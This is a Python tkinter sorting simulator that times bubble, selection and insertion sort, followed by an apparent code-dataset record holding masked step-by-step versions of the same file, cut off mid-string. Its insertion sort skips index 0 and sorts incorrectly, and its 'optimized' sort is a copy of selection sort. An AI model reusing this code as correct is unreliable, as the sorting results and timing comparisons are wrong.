aboutmenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="About", menu=aboutmenu)
aboutmenu.add_command(label="About", command=about)
aboutmenu.add_command(label="Help", command=help_box)
root.config(menu=menubar)
########################################################################
# DATA SAMPLING ------------------------------
frame_data = tk.Frame(root)
frame_data.place(relx=0.128, rely=0.140, relwidth=0.18,
relheight=0.65, anchor='n')
listbox_widget = tk.Listbox(
frame_data, selectmode="BROWSE", height=20, width=20, background='white')
listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)
listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)
listbox_widget_scrl.configure(command=listbox_widget.yview)
listbox_widget.grid(row=1, sticky=W)
listbox_widget_scrl.grid(row=1, column=1, sticky=NS)
# DATA HASIL ------------------------------
frame_hasil = tk.Frame(root)
frame_hasil.place(relx=0.34, rely=0.140, relwidth=0.18,
relheight=0.65, anchor='n')
hasil_listbox_widget = tk.Listbox(
frame_hasil, selectmode="BROWSE", height=20, width=20, background='white')
hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)
hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)
hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)
# hasil_listbox_entries = random.sample(range(100), 10)
# for hasil_entry in hasil_listbox_entries:
# hasil_listbox_widget.insert(tk.END, hasil_entry)
hasil_listbox_widget.grid(row=1, sticky=W)
hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)
# Entry
entry = tk.Entry(root, font=40, width=7)
entry.place(x=105, y=450)
# BUTTON
bbs_button = tk.Button(root, text="START", font=40,
command=bbs_respon).place(x=434, y=140)
iss_button = tk.Button(root, text="START", font=40,
command=iss_respon).place(x=555, y=140)
sss_button = tk.Button(root, text="START", font=40,
command=sss_respon).place(x=680, y=140)
bsi_button = tk.Button(root, text="START", font=40,
command=bsi_respon).place(x=466, y=330)
# GENERATE DATA SAMPLING
gen_button = tk.Button(root, text="GENERATE", font=40,
command=lambda: generate(entry.get()))
gen_button.place(x=180, y=447)
cls_button = tk.Button(root, text="CLEAN", font=40,
command=cls).place(x=295, y=447)
# RESPON TIME
bbs_time = ttk.Label(root, background="#6367c8",
foreground="#fff")
bbs_time['text'] = "Respon Time"
bbs_time.place(x=429, y=185)
iss_time = tk.Label(root,
background="#6367c8", foreground="#fff")
iss_time['text'] = "Respon Time"
iss_time.place(x=555, y=185)
sss_time = tk.Label(root,
background="#6367c8", foreground="#fff")
sss_time['text'] = "Respon Time"
sss_time.place(x=680, y=185)
bsi_time = tk.Label(root,
background="#6367c8", font=40, foreground="#fff")
bsi_time['text'] = "Respon Time"
bsi_time.place(x=570, y=333)
########################################################################
root.mainloop()
main()
|
normal
|
{
"blob_id": "8a9feae4ce209def2c98b7bed993f9b5c019a533",
"index": 7480,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n root = tk.Tk()\n root.resizable(width=False, height=False)\n root.title('Tugas Algoritma')\n canvas = tk.Canvas(root, height=500, width=800)\n canvas.pack()\n bg = tk.PhotoImage(file='bg.png')\n bl = tk.Label(root, image=bg)\n bl.place(relwidth=1, relheight=1)\n\n def about():\n messagebox.showinfo('About', 'Simulasi Algoritma Sorting')\n\n def help_box(event=None):\n messagebox.showinfo('Help', 'For help email to hai@irfnrdh.com',\n icon='question')\n\n def exit_editor():\n if messagebox.askokcancel('Quti', 'Do you really want to quit?'):\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', exit_editor)\n\n def donothing():\n print('Nothing to do :v')\n\n def bbsort(angka):\n for i in range(len(angka) - 1, 0, -1):\n for j in range(i):\n if angka[j] > angka[j + 1]:\n tampung = angka[j]\n angka[j] = angka[j + 1]\n angka[j + 1] = tampung\n\n def sssort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def issort(angka):\n for i in range(1, len(angka)):\n idx = angka[i]\n for j in range(i - 1, 0, -1):\n if angka[j] > idx:\n angka[j + 1] = angka[j]\n else:\n angka[j + 1] = idx\n break\n\n def bisort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def bbs_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### BUBLE SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bbsort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bbs_time.config(text='% .12f' % runtime)\n bbs_time.place(x=420, y=185)\n\n def iss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### INSERTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n issort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n iss_time.config(text='% .12f' % runtime)\n iss_time.place(x=545, y=185)\n\n def sss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### SELECTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n sssort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n sss_time.config(text='% .12f' % runtime)\n sss_time.place(x=670, y=185)\n\n def bsi_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print('#################################################### BSI')\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bisort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bsi_time.config(text='% .12f' % runtime)\n bsi_time.place(x=570, y=333)\n\n def generate(entry):\n listbox_widget.delete(0, tk.END)\n l = int(entry)\n listrandom = []\n for i in range(l):\n value = random.randint(1, 1000)\n listrandom.append(value)\n listbox_widget.insert(tk.END, value)\n angka = listrandom\n\n def cls():\n hasil_listbox_widget.delete(0, tk.END)\n print('\\n' * 100)\n menubar = Menu(root)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Generate Random Number', command=donothing)\n filemenu.add_command(label='Close', command=exit_editor)\n filemenu.add_separator()\n filemenu.add_command(label='Exit', command=root.quit)\n menubar.add_cascade(label='File', menu=filemenu)\n aboutmenu = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='About', menu=aboutmenu)\n aboutmenu.add_command(label='About', command=about)\n aboutmenu.add_command(label='Help', command=help_box)\n root.config(menu=menubar)\n frame_data = tk.Frame(root)\n frame_data.place(relx=0.128, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n listbox_widget = tk.Listbox(frame_data, selectmode='BROWSE', height=20,\n width=20, background='white')\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\n listbox_widget_scrl.configure(command=listbox_widget.yview)\n listbox_widget.grid(row=1, sticky=W)\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n frame_hasil = tk.Frame(root)\n frame_hasil.place(relx=0.34, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n hasil_listbox_widget = tk.Listbox(frame_hasil, selectmode='BROWSE',\n height=20, width=20, background='white')\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\n hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\n hasil_listbox_widget.grid(row=1, sticky=W)\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n entry = tk.Entry(root, font=40, width=7)\n entry.place(x=105, y=450)\n bbs_button = tk.Button(root, text='START', font=40, command=bbs_respon\n ).place(x=434, y=140)\n iss_button = tk.Button(root, text='START', font=40, command=iss_respon\n ).place(x=555, y=140)\n sss_button = tk.Button(root, text='START', font=40, command=sss_respon\n ).place(x=680, y=140)\n bsi_button = tk.Button(root, text='START', font=40, command=bsi_respon\n ).place(x=466, y=330)\n gen_button = tk.Button(root, text='GENERATE', font=40, command=lambda :\n generate(entry.get()))\n gen_button.place(x=180, y=447)\n cls_button = tk.Button(root, text='CLEAN', font=40, command=cls).place(x\n =295, y=447)\n bbs_time = ttk.Label(root, background='#6367c8', foreground='#fff')\n bbs_time['text'] = 'Respon Time'\n bbs_time.place(x=429, y=185)\n iss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n iss_time['text'] = 'Respon Time'\n iss_time.place(x=555, y=185)\n sss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n sss_time['text'] = 'Respon Time'\n sss_time.place(x=680, y=185)\n bsi_time = tk.Label(root, background='#6367c8', font=40, foreground='#fff')\n bsi_time['text'] = 'Respon Time'\n bsi_time.place(x=570, y=333)\n root.mainloop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n root = tk.Tk()\n root.resizable(width=False, height=False)\n root.title('Tugas Algoritma')\n canvas = tk.Canvas(root, height=500, width=800)\n canvas.pack()\n bg = tk.PhotoImage(file='bg.png')\n bl = tk.Label(root, image=bg)\n bl.place(relwidth=1, relheight=1)\n\n def about():\n messagebox.showinfo('About', 'Simulasi Algoritma Sorting')\n\n def help_box(event=None):\n messagebox.showinfo('Help', 'For help email to hai@irfnrdh.com',\n icon='question')\n\n def exit_editor():\n if messagebox.askokcancel('Quti', 'Do you really want to quit?'):\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', exit_editor)\n\n def donothing():\n print('Nothing to do :v')\n\n def bbsort(angka):\n for i in range(len(angka) - 1, 0, -1):\n for j in range(i):\n if angka[j] > angka[j + 1]:\n tampung = angka[j]\n angka[j] = angka[j + 1]\n angka[j + 1] = tampung\n\n def sssort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def issort(angka):\n for i in range(1, len(angka)):\n idx = angka[i]\n for j in range(i - 1, 0, -1):\n if angka[j] > idx:\n angka[j + 1] = angka[j]\n else:\n angka[j + 1] = idx\n break\n\n def bisort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def bbs_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### BUBLE SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bbsort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bbs_time.config(text='% .12f' % runtime)\n bbs_time.place(x=420, y=185)\n\n def iss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### INSERTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n issort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n iss_time.config(text='% .12f' % runtime)\n iss_time.place(x=545, y=185)\n\n def sss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### SELECTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n sssort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n sss_time.config(text='% .12f' % runtime)\n sss_time.place(x=670, y=185)\n\n def bsi_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print('#################################################### BSI')\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bisort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bsi_time.config(text='% .12f' % runtime)\n bsi_time.place(x=570, y=333)\n\n def generate(entry):\n listbox_widget.delete(0, tk.END)\n l = int(entry)\n listrandom = []\n for i in range(l):\n value = random.randint(1, 1000)\n listrandom.append(value)\n listbox_widget.insert(tk.END, value)\n angka = listrandom\n\n def cls():\n hasil_listbox_widget.delete(0, tk.END)\n print('\\n' * 100)\n menubar = Menu(root)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Generate Random Number', command=donothing)\n filemenu.add_command(label='Close', command=exit_editor)\n filemenu.add_separator()\n filemenu.add_command(label='Exit', command=root.quit)\n menubar.add_cascade(label='File', menu=filemenu)\n aboutmenu = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='About', menu=aboutmenu)\n aboutmenu.add_command(label='About', command=about)\n aboutmenu.add_command(label='Help', command=help_box)\n root.config(menu=menubar)\n frame_data = tk.Frame(root)\n frame_data.place(relx=0.128, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n listbox_widget = tk.Listbox(frame_data, selectmode='BROWSE', height=20,\n width=20, background='white')\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\n listbox_widget_scrl.configure(command=listbox_widget.yview)\n listbox_widget.grid(row=1, sticky=W)\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n frame_hasil = tk.Frame(root)\n frame_hasil.place(relx=0.34, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n hasil_listbox_widget = tk.Listbox(frame_hasil, selectmode='BROWSE',\n height=20, width=20, background='white')\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\n hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\n hasil_listbox_widget.grid(row=1, sticky=W)\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n entry = tk.Entry(root, font=40, width=7)\n entry.place(x=105, y=450)\n bbs_button = tk.Button(root, text='START', font=40, command=bbs_respon\n ).place(x=434, y=140)\n iss_button = tk.Button(root, text='START', font=40, command=iss_respon\n ).place(x=555, y=140)\n sss_button = tk.Button(root, text='START', font=40, command=sss_respon\n ).place(x=680, y=140)\n bsi_button = tk.Button(root, text='START', font=40, command=bsi_respon\n ).place(x=466, y=330)\n gen_button = tk.Button(root, text='GENERATE', font=40, command=lambda :\n generate(entry.get()))\n gen_button.place(x=180, y=447)\n cls_button = tk.Button(root, text='CLEAN', font=40, command=cls).place(x\n =295, y=447)\n bbs_time = ttk.Label(root, background='#6367c8', foreground='#fff')\n bbs_time['text'] = 'Respon Time'\n bbs_time.place(x=429, y=185)\n iss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n iss_time['text'] = 'Respon Time'\n iss_time.place(x=555, y=185)\n sss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n sss_time['text'] = 'Respon Time'\n sss_time.place(x=680, y=185)\n bsi_time = tk.Label(root, background='#6367c8', font=40, foreground='#fff')\n bsi_time['text'] = 'Respon Time'\n bsi_time.place(x=570, y=333)\n root.mainloop()\n\n\nmain()\n",
"step-4": "from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport random\nimport numpy as np\nimport timeit\n\n\ndef main():\n root = tk.Tk()\n root.resizable(width=False, height=False)\n root.title('Tugas Algoritma')\n canvas = tk.Canvas(root, height=500, width=800)\n canvas.pack()\n bg = tk.PhotoImage(file='bg.png')\n bl = tk.Label(root, image=bg)\n bl.place(relwidth=1, relheight=1)\n\n def about():\n messagebox.showinfo('About', 'Simulasi Algoritma Sorting')\n\n def help_box(event=None):\n messagebox.showinfo('Help', 'For help email to hai@irfnrdh.com',\n icon='question')\n\n def exit_editor():\n if messagebox.askokcancel('Quti', 'Do you really want to quit?'):\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', exit_editor)\n\n def donothing():\n print('Nothing to do :v')\n\n def bbsort(angka):\n for i in range(len(angka) - 1, 0, -1):\n for j in range(i):\n if angka[j] > angka[j + 1]:\n tampung = angka[j]\n angka[j] = angka[j + 1]\n angka[j + 1] = tampung\n\n def sssort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def issort(angka):\n for i in range(1, len(angka)):\n idx = angka[i]\n for j in range(i - 1, 0, -1):\n if angka[j] > idx:\n angka[j + 1] = angka[j]\n else:\n angka[j + 1] = idx\n break\n\n def bisort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def bbs_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### BUBLE SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bbsort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bbs_time.config(text='% .12f' % runtime)\n bbs_time.place(x=420, y=185)\n\n def iss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### INSERTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n issort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n iss_time.config(text='% .12f' % runtime)\n iss_time.place(x=545, y=185)\n\n def sss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### SELECTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n sssort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n sss_time.config(text='% .12f' % runtime)\n sss_time.place(x=670, y=185)\n\n def bsi_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print('#################################################### BSI')\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bisort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bsi_time.config(text='% .12f' % runtime)\n bsi_time.place(x=570, y=333)\n\n def generate(entry):\n listbox_widget.delete(0, tk.END)\n l = int(entry)\n listrandom = []\n for i in range(l):\n value = random.randint(1, 1000)\n listrandom.append(value)\n listbox_widget.insert(tk.END, value)\n angka = listrandom\n\n def cls():\n hasil_listbox_widget.delete(0, tk.END)\n print('\\n' * 100)\n menubar = Menu(root)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Generate Random Number', command=donothing)\n filemenu.add_command(label='Close', command=exit_editor)\n filemenu.add_separator()\n filemenu.add_command(label='Exit', command=root.quit)\n menubar.add_cascade(label='File', menu=filemenu)\n aboutmenu = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='About', menu=aboutmenu)\n aboutmenu.add_command(label='About', command=about)\n aboutmenu.add_command(label='Help', command=help_box)\n root.config(menu=menubar)\n frame_data = tk.Frame(root)\n frame_data.place(relx=0.128, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n listbox_widget = tk.Listbox(frame_data, selectmode='BROWSE', height=20,\n width=20, background='white')\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\n listbox_widget_scrl.configure(command=listbox_widget.yview)\n listbox_widget.grid(row=1, sticky=W)\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n frame_hasil = tk.Frame(root)\n frame_hasil.place(relx=0.34, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n hasil_listbox_widget = tk.Listbox(frame_hasil, selectmode='BROWSE',\n height=20, width=20, background='white')\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\n hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\n hasil_listbox_widget.grid(row=1, sticky=W)\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n entry = tk.Entry(root, font=40, width=7)\n entry.place(x=105, y=450)\n bbs_button = tk.Button(root, text='START', font=40, command=bbs_respon\n ).place(x=434, y=140)\n iss_button = tk.Button(root, text='START', font=40, command=iss_respon\n ).place(x=555, y=140)\n sss_button = tk.Button(root, text='START', font=40, command=sss_respon\n ).place(x=680, y=140)\n bsi_button = tk.Button(root, text='START', font=40, command=bsi_respon\n ).place(x=466, y=330)\n gen_button = tk.Button(root, text='GENERATE', font=40, command=lambda :\n generate(entry.get()))\n gen_button.place(x=180, y=447)\n cls_button = tk.Button(root, text='CLEAN', font=40, command=cls).place(x\n =295, y=447)\n bbs_time = ttk.Label(root, background='#6367c8', foreground='#fff')\n bbs_time['text'] = 'Respon Time'\n bbs_time.place(x=429, y=185)\n iss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n iss_time['text'] = 'Respon Time'\n iss_time.place(x=555, y=185)\n sss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n sss_time['text'] = 'Respon Time'\n sss_time.place(x=680, y=185)\n bsi_time = tk.Label(root, background='#6367c8', font=40, foreground='#fff')\n bsi_time['text'] = 'Respon Time'\n bsi_time.place(x=570, y=333)\n root.mainloop()\n\n\nmain()\n",
"step-5": "from tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\n\r\nimport random\r\nimport numpy as np\r\n\r\nimport timeit\r\n\r\n\r\ndef main():\r\n\r\n root = tk.Tk()\r\n # root.geometry('800x500')\r\n root.resizable(width=False, height=False)\r\n root.title('Tugas Algoritma')\r\n\r\n canvas = tk.Canvas(root, height=500, width=800)\r\n canvas.pack()\r\n\r\n bg = tk.PhotoImage(file='bg.png')\r\n bl = tk.Label(root, image=bg)\r\n bl.place(relwidth=1, relheight=1)\r\n\r\n # root.iconbitmap('icons/pypad.ico')\r\n\r\n ########################################################################\r\n\r\n def about():\r\n messagebox.showinfo(\"About\", \"Simulasi Algoritma Sorting\")\r\n\r\n def help_box(event=None):\r\n messagebox.showinfo(\r\n \"Help\", \"For help email to hai@irfnrdh.com\", icon='question')\r\n\r\n def exit_editor():\r\n if messagebox.askokcancel(\"Quti\", \"Do you really want to quit?\"):\r\n root.destroy()\r\n root.protocol('WM_DELETE_WINDOW', exit_editor)\r\n\r\n def donothing():\r\n print(\"Nothing to do :v\")\r\n\r\n ########################################################################\r\n # Bubble Sort\r\n def bbsort(angka):\r\n for i in range(len(angka)-1, 0, -1):\r\n # swap = False\r\n for j in range(i):\r\n if angka[j] > angka[j+1]:\r\n tampung = angka[j]\r\n angka[j] = angka[j+1]\r\n angka[j+1] = tampung\r\n # swap = True\r\n # if not swap:\r\n # break\r\n\r\n # Selection Sort\r\n\r\n def sssort(angka):\r\n for i in range(len(angka)):\r\n min_idx = i\r\n for j in range(i, len(angka)):\r\n if angka[j] < angka[min_idx]:\r\n min_idx = j\r\n tampung = angka[i]\r\n angka[i] = angka[min_idx]\r\n angka[min_idx] = tampung\r\n\r\n # Insertion Sort\r\n\r\n def issort(angka):\r\n for i in range(1, len(angka)):\r\n idx = angka[i]\r\n for j in range(i-1, 0, -1):\r\n if angka[j] > idx:\r\n angka[j+1] = angka[j]\r\n else:\r\n angka[j+1] = idx\r\n break\r\n\r\n # Bubble+Insertion+Selection Sort Optimize\r\n\r\n def bisort(angka):\r\n for i in range(len(angka)):\r\n min_idx = i\r\n for j in range(i, len(angka)):\r\n if angka[j] < angka[min_idx]:\r\n min_idx = j\r\n tampung = angka[i]\r\n angka[i] = angka[min_idx]\r\n angka[min_idx] = tampung\r\n\r\n ########################################################################\r\n\r\n def bbs_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### BUBLE SORT \")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n bbsort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n bbs_time.config(text=\"% .12f\" % runtime)\r\n bbs_time.place(x=420, y=185)\r\n\r\n def iss_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### INSERTION SORT \")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n issort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n iss_time.config(text=\"% .12f\" % runtime)\r\n iss_time.place(x=545, y=185)\r\n\r\n def sss_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### SELECTION SORT \")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n sssort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n sss_time.config(text=\"% .12f\" % runtime)\r\n sss_time.place(x=670, y=185)\r\n\r\n def bsi_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### BSI\")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n bisort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n 